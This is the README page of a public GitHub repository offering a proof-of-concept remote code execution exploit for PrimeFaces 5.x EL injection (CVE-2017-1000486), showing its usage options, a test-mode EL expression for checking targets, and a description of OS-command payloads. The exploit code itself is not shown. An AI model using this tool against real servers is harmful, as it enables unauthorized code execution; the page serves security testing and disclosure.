Skip to content
Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486)
Branch: master
Clone or download
Latest commit a1dfbd1 Jun 4, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md
payload.js adding example payload Nov 2, 2018
primefaces.py Python3 is the future Jun 4, 2019
sleep.js

README.md

CVE-2017-1000486

Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486), a RCE vulnerability that can be used to gain Remote Code Execution on a target.

Vulnerability description

You can find an excellent description of the vulnerability on the Minded Security blog.

Usage

The exploit provides a help function that prints all important parameters

./primefaces.py --help

PrimeFaces 5.x EL injection exploit (CVE-2017-1000486) by MOGWAI LABS
=====================================================================

usage: primefaces.py [-h] [-t] [-e EXTENSION] url [payload]

PrimeFaces 5.x EL injection exploit

positional arguments:
  url                   The target URL (http/https)
  payload               File with the JavaScript (Rino/Nashorn) code to
                        execute or OS command

optional arguments:
  -h, --help            show this help message and exit
  -t, --test            Test mode (off by default)
  -e EXTENSION, --extension EXTENSION
                        Extension of the target (xhtml, jsf)

The exploit provides a simple test mode (-t parameter) that can be used to verify if a target is actually vulnerable. This works by sending the following EL-Expression to the target, which will add an additional header field to the HTTP response. The header is then checked by the exploit:

${facesContext.getExternalContext().setResponseHeader("MOGWAILABS","CHKCHK")}

Actual exploitation works by invoking the JavaScript interpreter that is bundeld with the Java VM. This allows to execute arbitrary Java Code from JavaScript.

The exploit provides two example payloads:

  • payload.js (Execute a OS command)
  • sleep.js (Sleep for 4 seconds, causing a delay of the response)

Please note that none of this examples will provide you with the output of the command.

You can’t perform that action at this time.